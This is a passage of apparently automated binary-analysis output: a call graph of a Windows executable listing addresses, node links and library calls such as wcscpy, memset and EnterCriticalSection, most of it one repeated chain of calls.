API calls 2787->2788 2789 7ff612d3156c 2788->2789 2790 7ff612d31394 2 API calls 2789->2790 2791 7ff612d3157b 2790->2791 2792 7ff612d31394 2 API calls 2791->2792 2793 7ff612d3158a 2792->2793 2794 7ff612d31394 2 API calls 2793->2794 2795 7ff612d31599 2794->2795 2796 7ff612d31394 2 API calls 2795->2796 2797 7ff612d315a8 2796->2797 2798 7ff612d31394 2 API calls 2797->2798 2799 7ff612d315b7 2798->2799 2800 7ff612d31394 2 API calls 2799->2800 2801 7ff612d315c6 2800->2801 2802 7ff612d31394 2 API calls 2801->2802 2803 7ff612d315d5 2802->2803 2804 7ff612d31394 2 API calls 2803->2804 2805 7ff612d315e4 2804->2805 2806 7ff612d31394 2 API calls 2805->2806 2807 7ff612d315f3 2806->2807 2807->2433 2808 7ff612d31440 2807->2808 2809 7ff612d31394 2 API calls 2808->2809 2810 7ff612d3144f 2809->2810 2811 7ff612d31394 2 API calls 2810->2811 2812 7ff612d3145e 2811->2812 2813 7ff612d31394 2 API calls 2812->2813 2814 7ff612d3146d 2813->2814 2815 7ff612d31394 2 API calls 2814->2815 2816 7ff612d3147c 2815->2816 2817 7ff612d31394 2 API calls 2816->2817 2818 7ff612d3148b 2817->2818 2819 7ff612d31394 2 API calls 2818->2819 2820 7ff612d3149a 2819->2820 2821 7ff612d31394 2 API calls 2820->2821 2822 7ff612d314a9 2821->2822 2823 7ff612d31394 2 API calls 2822->2823 2824 7ff612d314b8 2823->2824 2825 7ff612d31394 2 API calls 2824->2825 2826 7ff612d314c7 2825->2826 2827 7ff612d31394 2 API calls 2826->2827 2828 7ff612d314d6 2827->2828 2829 7ff612d31394 2 API calls 2828->2829 2830 7ff612d314e5 2829->2830 2831 7ff612d31394 2 API calls 2830->2831 2832 7ff612d314f4 2831->2832 2833 7ff612d31394 2 API calls 2832->2833 2834 7ff612d31503 2833->2834 2835 7ff612d31394 2 API calls 2834->2835 2836 7ff612d31512 2835->2836 2837 7ff612d31394 2 API calls 2836->2837 2838 7ff612d31521 2837->2838 2839 7ff612d31530 2838->2839 2840 7ff612d31394 2 API calls 2838->2840 2841 7ff612d31394 2 API calls 2839->2841 2840->2839 2842 7ff612d3153a 2841->2842 2843 7ff612d31394 2 API calls 2842->2843 2844 7ff612d3153f 2843->2844 2845 7ff612d31394 2 API calls 2844->2845 2846 7ff612d3154e 2845->2846 2847 7ff612d31394 2 API calls 2846->2847 2848 7ff612d3155d 2847->2848 2849 7ff612d31394 2 API calls 2848->2849 2850 7ff612d3156c 2849->2850 2851 7ff612d31394 2 API calls 2850->2851 2852 7ff612d3157b 2851->2852 2853 7ff612d31394 2 API calls 2852->2853 2854 7ff612d3158a 2853->2854 2855 7ff612d31394 2 API calls 2854->2855 2856 7ff612d31599 2855->2856 2857 7ff612d31394 2 API calls 2856->2857 2858 7ff612d315a8 2857->2858 2859 7ff612d31394 2 API calls 2858->2859 2860 7ff612d315b7 2859->2860 2861 7ff612d31394 2 API calls 2860->2861 2862 7ff612d315c6 2861->2862 2863 7ff612d31394 2 API calls 2862->2863 2864 7ff612d315d5 2863->2864 2865 7ff612d31394 2 API calls 2864->2865 2866 7ff612d315e4 2865->2866 2867 7ff612d31394 2 API calls 2866->2867 2868 7ff612d315f3 2867->2868 2868->2433 2868->2444 2870 7ff612d335c1 memset 2869->2870 2880 7ff612d333c3 2869->2880 2873 7ff612d335e6 2870->2873 2871 7ff612d3343a memset 2871->2880 2872 7ff612d3362b wcscpy wcscat wcslen 2874 7ff612d31422 2 API calls 2872->2874 2873->2872 2876 7ff612d33728 2874->2876 2875 7ff612d33493 wcscpy wcscat wcslen 3130 7ff612d31422 2875->3130 2878 7ff612d33767 2876->2878 3199 7ff612d31431 2876->3199 2885 7ff612d314c7 2878->2885 2880->2870 2880->2871 2880->2875 2882 7ff612d3145e 2 API calls 2880->2882 2884 7ff612d33579 2880->2884 2882->2880 2883 7ff612d3145e 2 API calls 2883->2878 2884->2870 2886 7ff612d31394 2 API calls 2885->2886 2887 7ff612d314d6 2886->2887 2888 7ff612d31394 2 API calls 2887->2888 2889 7ff612d314e5 2888->2889 2890 7ff612d31394 2 API calls 2889->2890 2891 7ff612d314f4 2890->2891 2892 7ff612d31394 2 API calls 2891->2892 2893 7ff612d31503 2892->2893 2894 7ff612d31394 2 API calls 2893->2894 2895 7ff612d31512 2894->2895 2896 7ff612d31394 2 API calls 2895->2896 2897 7ff612d31521 2896->2897 2898 7ff612d31530 2897->2898 2899 7ff612d31394 2 API calls 2897->2899 2900 7ff612d31394 2 API calls 2898->2900 2899->2898 2901 7ff612d3153a 2900->2901 2902 7ff612d31394 2 API calls 2901->2902 2903 7ff612d3153f 2902->2903 2904 7ff612d31394 2 API calls 2903->2904 2905 7ff612d3154e 2904->2905 2906 7ff612d31394 2 API calls 2905->2906 2907 7ff612d3155d 2906->2907 2908 7ff612d31394 2 API calls 2907->2908 2909 7ff612d3156c 2908->2909 2910 7ff612d31394 2 API calls 2909->2910 2911 7ff612d3157b 2910->2911 2912 7ff612d31394 2 API calls 2911->2912 2913 7ff612d3158a 2912->2913 2914 7ff612d31394 2 API calls 2913->2914 2915 7ff612d31599 2914->2915 2916 7ff612d31394 2 API calls 2915->2916 2917 7ff612d315a8 2916->2917 2918 7ff612d31394 2 API calls 2917->2918 2919 7ff612d315b7 2918->2919 2920 7ff612d31394 2 API calls 2919->2920 2921 7ff612d315c6 2920->2921 2922 7ff612d31394 2 API calls 2921->2922 2923 7ff612d315d5 2922->2923 2924 7ff612d31394 2 API calls 2923->2924 2925 7ff612d315e4 2924->2925 2926 7ff612d31394 2 API calls 2925->2926 2927 7ff612d315f3 2926->2927 2927->2462 2927->2464 2929 7ff612d32f88 2928->2929 2930 7ff612d314a9 2 API calls 2929->2930 2931 7ff612d32fd0 2930->2931 2931->2430 2933 7ff612d32690 10 API calls 2932->2933 2934 7ff612d338fe 2933->2934 2935 7ff612d314a9 2 API calls 2934->2935 2954 7ff612d33b01 2934->2954 2936 7ff612d33947 2935->2936 2937 7ff612d33b08 2936->2937 3264 7ff612d314b8 2936->3264 3467 7ff612d315c6 2937->3467 2940 7ff612d33a67 memset 3314 7ff612d3148b 2940->3314 2942 7ff612d314b8 2 API calls 2944 7ff612d3396f 2942->2944 2944->2940 2944->2942 3309 7ff612d315d5 2944->3309 2948 7ff612d314b8 2 API calls 2949 7ff612d33ae7 2948->2949 2949->2937 2950 7ff612d33aeb 2949->2950 3414 7ff612d3147c 2950->3414 2953 7ff612d3145e 2 API calls 2953->2954 2954->2443 2959 7ff612d36e80 2955->2959 2957 7ff612d313b8 2958 7ff612d313c6 NtWaitForWorkViaWorkerFactory 2957->2958 2958->2503 2960 7ff612d36e9e 2959->2960 2963 7ff612d36ecb 2959->2963 2960->2957 2961 7ff612d36f73 2962 7ff612d36f8f malloc 2961->2962 2964 7ff612d36fb0 2962->2964 2963->2960 2963->2961 2964->2960 2966 7ff612d3266f memset 2965->2966 2966->2671 3033 7ff612d3155d 2967->3033 2969 7ff612d327f4 2970 7ff612d314c7 2 API calls 2969->2970 2971 7ff612d32816 2970->2971 2975 7ff612d31503 2 API calls 2971->2975 2973 7ff612d32785 wcsncmp 3054 7ff612d314e5 2973->3054 2976 7ff612d3283d 2975->2976 2978 7ff612d32847 memset 2976->2978 2977 7ff612d32d27 2979 7ff612d32877 2978->2979 2980 7ff612d328bc wcscpy wcscat wcslen 2979->2980 2981 7ff612d3291a 2980->2981 2982 7ff612d328ee wcslen 2980->2982 2983 7ff612d32967 wcslen 2981->2983 2985 7ff612d32985 2981->2985 2982->2981 2983->2985 2984 7ff612d329d9 wcslen 2986 7ff612d314a9 2 API calls 2984->2986 2985->2977 2985->2984 2987 7ff612d32a73 2986->2987 2988 7ff612d314a9 2 API calls 2987->2988 2989 7ff612d32bd2 2988->2989 3093 7ff612d314f4 2989->3093 2992 7ff612d314c7 2 API calls 2993 7ff612d32c99 2992->2993 2994 7ff612d314c7 2 API calls 2993->2994 2995 7ff612d32cb1 2994->2995 2996 7ff612d3145e 2 API calls 2995->2996 2997 7ff612d32cbb 2996->2997 2998 7ff612d3145e 2 API calls 2997->2998 2999 7ff612d32cc5 2998->2999 2999->2670 3001 7ff612d31394 2 API calls 3000->3001 3002 7ff612d31521 3001->3002 3003 7ff612d31530 3002->3003 3004 7ff612d31394 2 API calls 3002->3004 3005 7ff612d31394 2 API calls 3003->3005 3004->3003 3006 7ff612d3153a 3005->3006 3007 7ff612d31394 2 API calls 3006->3007 3008 7ff612d3153f 3007->3008 3009 7ff612d31394 2 API calls 3008->3009 3010 7ff612d3154e 3009->3010 3011 7ff612d31394 2 API calls 3010->3011 3012 7ff612d3155d 3011->3012 3013 7ff612d31394 2 API calls 3012->3013 3014 7ff612d3156c 3013->3014 3015 7ff612d31394 2 API calls 3014->3015 3016 7ff612d3157b 3015->3016 3017 7ff612d31394 2 API calls 3016->3017 3018 7ff612d3158a 3017->3018 3019 7ff612d31394 2 API calls 3018->3019 3020 7ff612d31599 3019->3020 3021 7ff612d31394 2 API calls 3020->3021 3022 7ff612d315a8 3021->3022 3023 7ff612d31394 2 API calls 3022->3023 3024 7ff612d315b7 3023->3024 3025 7ff612d31394 2 API calls 3024->3025 3026 7ff612d315c6 3025->3026 3027 7ff612d31394 2 API calls 3026->3027 3028 7ff612d315d5 3027->3028 3029 7ff612d31394 2 API calls 3028->3029 3030 7ff612d315e4 3029->3030 3031 7ff612d31394 2 API calls 3030->3031 3032 7ff612d315f3 3031->3032 3032->2673 3034 7ff612d31394 2 API calls 3033->3034 3035 7ff612d3156c 3034->3035 3036 7ff612d31394 2 API calls 3035->3036 3037 7ff612d3157b 3036->3037 3038 7ff612d31394 2 API calls 3037->3038 3039 7ff612d3158a 3038->3039 3040 7ff612d31394 2 API calls 3039->3040 3041 7ff612d31599 3040->3041 3042 7ff612d31394 2 API calls 3041->3042 3043 7ff612d315a8 3042->3043 3044 7ff612d31394 2 API calls 3043->3044 3045 7ff612d315b7 3044->3045 3046 7ff612d31394 2 API calls 3045->3046 3047 7ff612d315c6 3046->3047 3048 7ff612d31394 2 API calls 3047->3048 3049 7ff612d315d5 3048->3049 3050 7ff612d31394 2 API calls 3049->3050 3051 7ff612d315e4 3050->3051 3052 7ff612d31394 2 API calls 3051->3052 3053 7ff612d315f3 3052->3053 3053->2969 3053->2973 3053->2977 3055 7ff612d31394 2 API calls 3054->3055 3056 7ff612d314f4 3055->3056 3057 7ff612d31394 2 API calls 3056->3057 3058 7ff612d31503 3057->3058 3059 7ff612d31394 2 API calls 3058->3059 3060 7ff612d31512 3059->3060 3061 7ff612d31394 2 API calls 3060->3061 3062 7ff612d31521 3061->3062 3063 7ff612d31530 3062->3063 3064 7ff612d31394 2 API calls 3062->3064 3065 7ff612d31394 2 API calls 3063->3065 3064->3063 3066 7ff612d3153a 3065->3066 3067 7ff612d31394 2 API calls 3066->3067 3068 7ff612d3153f 3067->3068 3069 7ff612d31394 2 API calls 3068->3069 3070 7ff612d3154e 3069->3070 3071 7ff612d31394 2 API calls 3070->3071 3072 7ff612d3155d 3071->3072 3073 7ff612d31394 2 API calls 3072->3073 3074 7ff612d3156c 3073->3074 3075 7ff612d31394 2 API calls 3074->3075 3076 7ff612d3157b 3075->3076 3077 7ff612d31394 2 API calls 3076->3077 3078 7ff612d3158a 3077->3078 3079 7ff612d31394 2 API calls 3078->3079 3080 7ff612d31599 3079->3080 3081 7ff612d31394 2 API calls 3080->3081 3082 7ff612d315a8 3081->3082 3083 7ff612d31394 2 API calls 3082->3083 3084 7ff612d315b7 3083->3084 3085 7ff612d31394 2 API calls 3084->3085 3086 7ff612d315c6 3085->3086 3087 7ff612d31394 2 API calls 3086->3087 3088 7ff612d315d5 3087->3088 3089 7ff612d31394 2 API calls 3088->3089 3090 7ff612d315e4 3089->3090 3091 7ff612d31394 2 API calls 3090->3091 3092 7ff612d315f3 3091->3092 3092->2969 3094 7ff612d31394 2 API calls 3093->3094 3095 7ff612d31503 3094->3095 3096 7ff612d31394 2 API calls 3095->3096 3097 7ff612d31512 3096->3097 3098 7ff612d31394 2 API calls 3097->3098 3099 7ff612d31521 3098->3099 3100 7ff612d31530 3099->3100 3101 7ff612d31394 2 API calls 3099->3101 3102 7ff612d31394 2 API calls 3100->3102 3101->3100 3103 7ff612d3153a 3102->3103 3104 7ff612d31394 2 API calls 3103->3104 3105 7ff612d3153f 3104->3105 3106 7ff612d31394 2 API calls 3105->3106 3107 7ff612d3154e 3106->3107 3108 7ff612d31394 2 API calls 3107->3108 3109 7ff612d3155d 3108->3109 3110 7ff612d31394 2 API calls 3109->3110 3111 7ff612d3156c 3110->3111 3112 7ff612d31394 2 API calls 3111->3112 3113 7ff612d3157b 3112->3113 3114 7ff612d31394 2 API calls 3113->3114 3115 7ff612d3158a 3114->3115 3116 7ff612d31394 2 API calls 3115->3116 3117 7ff612d31599 3116->3117 3118 7ff612d31394 2 API calls 3117->3118 3119 7ff612d315a8 3118->3119 3120 7ff612d31394 2 API calls 3119->3120 3121 7ff612d315b7 3120->3121 3122 7ff612d31394 2 API calls 3121->3122 3123 7ff612d315c6 3122->3123 3124 7ff612d31394 2 API calls 3123->3124 3125 7ff612d315d5 3124->3125 3126 7ff612d31394 2 API calls 3125->3126 3127 7ff612d315e4 3126->3127 3128 7ff612d31394 2 API calls 3127->3128 3129 7ff612d315f3 3128->3129 3129->2992 3131 7ff612d31394 2 API calls 3130->3131 3132 7ff612d3142c 3131->3132 3133 7ff612d31431 3132->3133 3134 7ff612d31394 2 API calls 3132->3134 3135 7ff612d31394 2 API calls 3133->3135 3134->3133 3136 7ff612d3143b 3135->3136 3137 7ff612d31394 2 API calls 3136->3137 3138 7ff612d31440 3137->3138 3139 7ff612d31394 2 API calls 3138->3139 3140 7ff612d3144f 3139->3140 3141 7ff612d31394 2 API calls 3140->3141 3142 7ff612d3145e 3141->3142 3143 7ff612d31394 2 API calls 3142->3143 3144 7ff612d3146d 3143->3144 3145 7ff612d31394 2 API calls 3144->3145 3146 7ff612d3147c 3145->3146 3147 7ff612d31394 2 API calls 3146->3147 3148 7ff612d3148b 3147->3148 3149 7ff612d31394 2 API calls 3148->3149 3150 7ff612d3149a 3149->3150 3151 7ff612d31394 2 API calls 3150->3151 3152 7ff612d314a9 3151->3152 3153 7ff612d31394 2 API calls 3152->3153 3154 7ff612d314b8 3153->3154 3155 7ff612d31394 2 API calls 3154->3155 3156 7ff612d314c7 3155->3156 3157 7ff612d31394 2 API calls 3156->3157 3158 7ff612d314d6 3157->3158 3159 7ff612d31394 2 API calls 3158->3159 3160 7ff612d314e5 3159->3160 3161 7ff612d31394 2 API calls 3160->3161 3162 7ff612d314f4 3161->3162 3163 7ff612d31394 2 API calls 3162->3163 3164 7ff612d31503 3163->3164 3165 7ff612d31394 2 API calls 3164->3165 3166 7ff612d31512 3165->3166 3167 7ff612d31394 2 API calls 3166->3167 3168 7ff612d31521 3167->3168 3169 7ff612d31530 3168->3169 3170 7ff612d31394 2 API calls 3168->3170 3171 7ff612d31394 2 API calls 3169->3171 3170->3169 3172 7ff612d3153a 3171->3172 3173 7ff612d31394 2 API calls 3172->3173 3174 7ff612d3153f 3173->3174 3175 7ff612d31394 2 API calls 3174->3175 3176 7ff612d3154e 3175->3176 3177 7ff612d31394 2 API calls 3176->3177 3178 7ff612d3155d 3177->3178 3179 7ff612d31394 2 API calls 3178->3179 3180 7ff612d3156c 3179->3180 3181 7ff612d31394 2 API calls 3180->3181 3182 7ff612d3157b 3181->3182 3183 7ff612d31394 2 API calls 3182->3183 3184 7ff612d3158a 3183->3184 3185 7ff612d31394 2 API calls 3184->3185 3186 7ff612d31599 3185->3186 3187 7ff612d31394 2 API calls 3186->3187 3188 7ff612d315a8 3187->3188 3189 7ff612d31394 2 API calls 3188->3189 3190 7ff612d315b7 3189->3190 3191 7ff612d31394 2 API calls 3190->3191 3192 7ff612d315c6 3191->3192 3193 7ff612d31394 2 API calls 3192->3193 3194 7ff612d315d5 3193->3194 3195 7ff612d31394 2 API calls 3194->3195 3196 7ff612d315e4 3195->3196 3197 7ff612d31394 2 API calls 3196->3197 3198 7ff612d315f3 3197->3198 3198->2880 3200 7ff612d31394 2 API calls 3199->3200 3201 7ff612d3143b 3200->3201 3202 7ff612d31394 2 API calls 3201->3202 3203 7ff612d31440 3202->3203 3204 7ff612d31394 2 API calls 3203->3204 3205 7ff612d3144f 3204->3205 3206 7ff612d31394 2 API calls 3205->3206 3207 7ff612d3145e 3206->3207 3208 7ff612d31394 2 API calls 3207->3208 3209 7ff612d3146d 3208->3209 3210 7ff612d31394 2 API calls 3209->3210 3211 7ff612d3147c 3210->3211 3212 7ff612d31394 2 API calls 3211->3212 3213 7ff612d3148b 3212->3213 3214 7ff612d31394 2 API calls 3213->3214 3215 7ff612d3149a 3214->3215 3216 7ff612d31394 2 API calls 3215->3216 3217 7ff612d314a9 3216->3217 3218 7ff612d31394 2 API calls 3217->3218 3219 7ff612d314b8 3218->3219 3220 7ff612d31394 2 API calls 3219->3220 3221 7ff612d314c7 3220->3221 3222 7ff612d31394 2 API calls 3221->3222 3223 7ff612d314d6 3222->3223 3224 7ff612d31394 2 API calls 3223->3224 3225 7ff612d314e5 3224->3225 3226 7ff612d31394 2 API calls 3225->3226 3227 7ff612d314f4 3226->3227 3228 7ff612d31394 2 API calls 3227->3228 3229 7ff612d31503 3228->3229 3230 7ff612d31394 2 API calls 3229->3230 3231 7ff612d31512 3230->3231 3232 7ff612d31394 2 API calls 3231->3232 3233 7ff612d31521 3232->3233 3234 7ff612d31530 3233->3234 3235 7ff612d31394 2 API calls 3233->3235 3236 7ff612d31394 2 API calls 3234->3236 3235->3234 3237 7ff612d3153a 3236->3237 3238 7ff612d31394 2 API calls 3237->3238 3239 7ff612d3153f 3238->3239 3240 7ff612d31394 2 API calls 3239->3240 3241 7ff612d3154e 3240->3241 3242 7ff612d31394 2 API calls 3241->3242 3243 7ff612d3155d 3242->3243 3244 7ff612d31394 2 API calls 3243->3244 3245 7ff612d3156c 3244->3245 3246 7ff612d31394 2 API calls 3245->3246 3247 7ff612d3157b 3246->3247 3248 7ff612d31394 2 API calls 3247->3248 3249 7ff612d3158a 3248->3249 3250 7ff612d31394 2 API calls 3249->3250 3251 7ff612d31599 3250->3251 3252 7ff612d31394 2 API calls 3251->3252 3253 7ff612d315a8 3252->3253 3254 7ff612d31394 2 API calls 3253->3254 3255 7ff612d315b7 3254->3255 3256 7ff612d31394 2 API calls 3255->3256 3257 7ff612d315c6 3256->3257 3258 7ff612d31394 2 API calls 3257->3258 3259 7ff612d315d5 3258->3259 3260 7ff612d31394 2 API calls 3259->3260 3261 7ff612d315e4 3260->3261 3262 7ff612d31394 2 API calls 3261->3262 3263 7ff612d315f3 3262->3263 3263->2883 3265 7ff612d31394 2 API calls 3264->3265 3266 7ff612d314c7 3265->3266 3267 7ff612d31394 2 API calls 3266->3267 3268 7ff612d314d6 3267->3268 3269 7ff612d31394 2 API calls 3268->3269 3270 7ff612d314e5 3269->3270 3271 7ff612d31394 2 API calls 3270->3271 3272 7ff612d314f4 3271->3272 3273 7ff612d31394 2 API calls 3272->3273 3274 7ff612d31503 3273->3274 3275 7ff612d31394 2 API calls 3274->3275 3276 7ff612d31512 3275->3276 3277 7ff612d31394 2 API calls 3276->3277 3278 7ff612d31521 3277->3278 3279 7ff612d31530 3278->3279 3280 7ff612d31394 2 API calls 3278->3280 3281 7ff612d31394 2 API calls 3279->3281 3280->3279 3282 7ff612d3153a 3281->3282 3283 7ff612d31394 2 API calls 3282->3283 3284 7ff612d3153f 3283->3284 3285 7ff612d31394 2 API calls 3284->3285 3286 7ff612d3154e 3285->3286 3287 7ff612d31394 2 API calls 3286->3287 3288 7ff612d3155d 3287->3288 3289 7ff612d31394 2 API calls 3288->3289 3290 7ff612d3156c 3289->3290 3291 7ff612d31394 2 API calls 3290->3291 3292 7ff612d3157b 3291->3292 3293 7ff612d31394 2 API calls 3292->3293 3294 7ff612d3158a 3293->3294 3295 7ff612d31394 2 API calls 3294->3295 3296 7ff612d31599 3295->3296 3297 7ff612d31394 2 API calls 3296->3297 3298 7ff612d315a8 3297->3298 3299 7ff612d31394 2 API calls 3298->3299 3300 7ff612d315b7 3299->3300 3301 7ff612d31394 2 API calls 3300->3301 3302 7ff612d315c6 3301->3302 3303 7ff612d31394 2 API calls 3302->3303 3304 7ff612d315d5 3303->3304 3305 7ff612d31394 2 API calls 3304->3305 3306 7ff612d315e4 3305->3306 3307 7ff612d31394 2 API calls 3306->3307 3308 7ff612d315f3 3307->3308 3308->2944 3310 7ff612d31394 2 API calls 3309->3310 3311 7ff612d315e4 3310->3311 3312 7ff612d31394 2 API calls 3311->3312 3313 7ff612d315f3 3312->3313 3313->2944 3315 7ff612d31394 2 API calls 3314->3315 3316 7ff612d3149a 3315->3316 3317 7ff612d31394 2 API calls 3316->3317 3318 7ff612d314a9 3317->3318 3319 7ff612d31394 2 API calls 3318->3319 3320 7ff612d314b8 3319->3320 3321 7ff612d31394 2 API calls 3320->3321 3322 7ff612d314c7 3321->3322 3323 7ff612d31394 2 API calls 3322->3323 3324 7ff612d314d6 3323->3324 3325 7ff612d31394 2 API calls 3324->3325 3326 7ff612d314e5 3325->3326 3327 7ff612d31394 2 API calls 3326->3327 3328 7ff612d314f4 3327->3328 3329 7ff612d31394 2 API calls 3328->3329 3330 7ff612d31503 3329->3330 3331 7ff612d31394 2 API calls 3330->3331 3332 7ff612d31512 3331->3332 3333 7ff612d31394 2 API calls 3332->3333 3334 7ff612d31521 3333->3334 3335 7ff612d31530 3334->3335 3336 7ff612d31394 2 API calls 3334->3336 3337 7ff612d31394 2 API calls 3335->3337 3336->3335 3338 7ff612d3153a 3337->3338 3339 7ff612d31394 2 API calls 3338->3339 3340 7ff612d3153f 3339->3340 3341 7ff612d31394 2 API calls 3340->3341 3342 7ff612d3154e 3341->3342 3343 7ff612d31394 2 API calls 3342->3343 3344 7ff612d3155d 3343->3344 3345 7ff612d31394 2 API calls 3344->3345 3346 7ff612d3156c 3345->3346 3347 7ff612d31394 2 API calls 3346->3347 3348 7ff612d3157b 3347->3348 3349 7ff612d31394 2 API calls 3348->3349 3350 7ff612d3158a 3349->3350 3351 7ff612d31394 2 API calls 3350->3351 3352 7ff612d31599 3351->3352 3353 7ff612d31394 2 API calls 3352->3353 3354 7ff612d315a8 3353->3354 3355 7ff612d31394 2 API calls 3354->3355 3356 7ff612d315b7 3355->3356 3357 7ff612d31394 2 API calls 3356->3357 3358 7ff612d315c6 3357->3358 3359 7ff612d31394 2 API calls 3358->3359 3360 7ff612d315d5 3359->3360 3361 7ff612d31394 2 API calls 3360->3361 3362 7ff612d315e4 3361->3362 3363 7ff612d31394 2 API calls 3362->3363 3364 7ff612d315f3 3363->3364 3364->2937 3365 7ff612d3149a 3364->3365 3366 7ff612d31394 2 API calls 3365->3366 3367 7ff612d314a9 3366->3367 3368 7ff612d31394 2 API calls 3367->3368 3369 7ff612d314b8 3368->3369 3370 7ff612d31394 2 API calls 3369->3370 3371 7ff612d314c7 3370->3371 3372 7ff612d31394 2 API calls 3371->3372 3373 7ff612d314d6 3372->3373 3374 7ff612d31394 2 API calls 3373->3374 3375 7ff612d314e5 3374->3375 3376 7ff612d31394 2 API calls 3375->3376 3377 7ff612d314f4 3376->3377 3378 7ff612d31394 2 API calls 3377->3378 3379 7ff612d31503 3378->3379 3380 7ff612d31394 2 API calls 3379->3380 3381 7ff612d31512 3380->3381 3382 7ff612d31394 2 API calls 3381->3382 3383 7ff612d31521 3382->3383 3384 7ff612d31530 3383->3384 3385 7ff612d31394 2 API calls 3383->3385 3386 7ff612d31394 2 API calls 3384->3386 3385->3384 3387 7ff612d3153a 3386->3387 3388 7ff612d31394 2 API calls 3387->3388 3389 7ff612d3153f 3388->3389 3390 7ff612d31394 2 API calls 3389->3390 3391 7ff612d3154e 3390->3391 3392 7ff612d31394 2 API calls 3391->3392 3393 7ff612d3155d 3392->3393 3394 7ff612d31394 2 API calls 3393->3394 3395 7ff612d3156c 3394->3395 3396 7ff612d31394 2 API calls 3395->3396 3397 7ff612d3157b 3396->3397 3398 7ff612d31394 2 API calls 3397->3398 3399 7ff612d3158a 3398->3399 3400 7ff612d31394 2 API calls 3399->3400 3401 7ff612d31599 3400->3401 3402 7ff612d31394 2 API calls 3401->3402 3403 7ff612d315a8 3402->3403 3404 7ff612d31394 2 API calls 3403->3404 3405 7ff612d315b7 3404->3405 3406 7ff612d31394 2 API calls 3405->3406 3407 7ff612d315c6 3406->3407 3408 7ff612d31394 2 API calls 3407->3408 3409 7ff612d315d5 3408->3409 3410 7ff612d31394 2 API calls 3409->3410 3411 7ff612d315e4 3410->3411 3412 7ff612d31394 2 API calls 3411->3412 3413 7ff612d315f3 3412->3413 3413->2937 3413->2948 3415 7ff612d31394 2 API calls 3414->3415 3416 7ff612d3148b 3415->3416 3417 7ff612d31394 2 API calls 3416->3417 3418 7ff612d3149a 3417->3418 3419 7ff612d31394 2 API calls 3418->3419 3420 7ff612d314a9 3419->3420 3421 7ff612d31394 2 API calls 3420->3421 3422 7ff612d314b8 3421->3422 3423 7ff612d31394 2 API calls 3422->3423 3424 7ff612d314c7 3423->3424 3425 7ff612d31394 2 API calls 3424->3425 3426 7ff612d314d6 3425->3426 3427 7ff612d31394 2 API calls 3426->3427 3428 7ff612d314e5 3427->3428 3429 7ff612d31394 2 API calls 3428->3429 3430 7ff612d314f4 3429->3430 3431 7ff612d31394 2 API calls 3430->3431 3432 7ff612d31503 3431->3432 3433 7ff612d31394 2 API calls 3432->3433 3434 7ff612d31512 3433->3434 3435 7ff612d31394 2 API calls 3434->3435 3436 7ff612d31521 3435->3436 3437 7ff612d31530 3436->3437 3438 7ff612d31394 2 API calls 3436->3438 3439 7ff612d31394 2 API calls 3437->3439 3438->3437 3440 7ff612d3153a 3439->3440 3441 7ff612d31394 2 API calls 3440->3441 3442 7ff612d3153f 3441->3442 3443 7ff612d31394 2 API calls 3442->3443 3444 7ff612d3154e 3443->3444 3445 7ff612d31394 2 API calls 3444->3445 3446 7ff612d3155d 3445->3446 3447 7ff612d31394 2 API calls 3446->3447 3448 7ff612d3156c 3447->3448 3449 7ff612d31394 2 API calls 3448->3449 3450 7ff612d3157b 3449->3450 3451 7ff612d31394 2 API calls 3450->3451 3452 7ff612d3158a 3451->3452 3453 7ff612d31394 2 API calls 3452->3453 3454 7ff612d31599 3453->3454 3455 7ff612d31394 2 API calls 3454->3455 3456 7ff612d315a8 3455->3456 3457 7ff612d31394 2 API calls 3456->3457 3458 7ff612d315b7 3457->3458 3459 7ff612d31394 2 API calls 3458->3459 3460 7ff612d315c6 3459->3460 3461 7ff612d31394 2 API calls 3460->3461 3462 7ff612d315d5 3461->3462 3463 7ff612d31394 2 API calls 3462->3463 3464 7ff612d315e4 3463->3464 3465 7ff612d31394 2 API calls 3464->3465 3466 7ff612d315f3 3465->3466 3466->2953 3468 7ff612d31394 2 API calls 3467->3468 3469 7ff612d315d5 3468->3469 3470 7ff612d31394 2 API calls 3469->3470 3471 7ff612d315e4 3470->3471 3472 7ff612d31394 2 API calls 3471->3472 3473 7ff612d315f3 3472->3473 3473->2954 3478 7ff612d32320 strlen 3479 7ff612d32337 3478->3479 3495 7ff612d31000 3496 7ff612d3108b __set_app_type 3495->3496 3497 7ff612d31040 3495->3497 3498 7ff612d310b6 3496->3498 3497->3496 3499 7ff612d310e5 3498->3499 3501 7ff612d31e00 3498->3501 3502 7ff612d37410 __setusermatherr 3501->3502 3503 7ff612d31800 3504 7ff612d31812 3503->3504 3505 7ff612d31835 fprintf 3504->3505 3480 7ff612d3219e 3481 7ff612d321ab EnterCriticalSection 3480->3481 3482 7ff612d32272 3480->3482 3483 7ff612d32265 LeaveCriticalSection 3481->3483 3485 7ff612d321c8 3481->3485 3483->3482 3484 7ff612d321e9 TlsGetValue GetLastError 3484->3485 3485->3483 3485->3484 3506 7ff612d31404 3507 7ff612d31394 2 API calls 3506->3507 3508 7ff612d31413 3507->3508 3509 7ff612d31422 3508->3509 3510 7ff612d31394 2 API calls 3508->3510 3511 7ff612d31394 2 API calls 3509->3511 3510->3509 3512 7ff612d3142c 3511->3512 3513 7ff612d31431 3512->3513 3514 7ff612d31394 2 API calls 3512->3514 3515 7ff612d31394 2 API calls 3513->3515 3514->3513 3516 7ff612d3143b 3515->3516 3517 7ff612d31394 2 API calls 3516->3517 3518 7ff612d31440 3517->3518 3519 7ff612d31394 2 API calls 3518->3519 3520 7ff612d3144f 3519->3520 3521 7ff612d31394 2 API calls 3520->3521 3522 7ff612d3145e 3521->3522 3523 7ff612d31394 2 API calls 3522->3523 3524 7ff612d3146d 3523->3524 3525 7ff612d31394 2 API calls 3524->3525 3526 7ff612d3147c 3525->3526 3527 7ff612d31394 2 API calls 3526->3527 3528 7ff612d3148b 3527->3528 3529 7ff612d31394 2 API calls 3528->3529 3530 7ff612d3149a 3529->3530 3531 7ff612d31394 2 API calls 3530->3531 3532 7ff612d314a9 3531->3532 3533 7ff612d31394 2 API calls 3532->3533 3534 7ff612d314b8 3533->3534 3535 7ff612d31394 2 API calls 3534->3535 3536 7ff612d314c7 3535->3536 3537 7ff612d31394 2 API calls 3536->3537 3538 7ff612d314d6 3537->3538 3539 7ff612d31394 2 API calls 3538->3539 3540 7ff612d314e5 3539->3540 3541 7ff612d31394 2 API calls 3540->3541 3542 7ff612d314f4 3541->3542 3543 7ff612d31394 2 API calls 3542->3543 3544 7ff612d31503 3543->3544 3545 7ff612d31394 2 API calls 3544->3545 3546 7ff612d31512 3545->3546 3547 7ff612d31394 2 API calls 3546->3547 3548 7ff612d31521 3547->3548 3549 7ff612d31530 3548->3549 3550 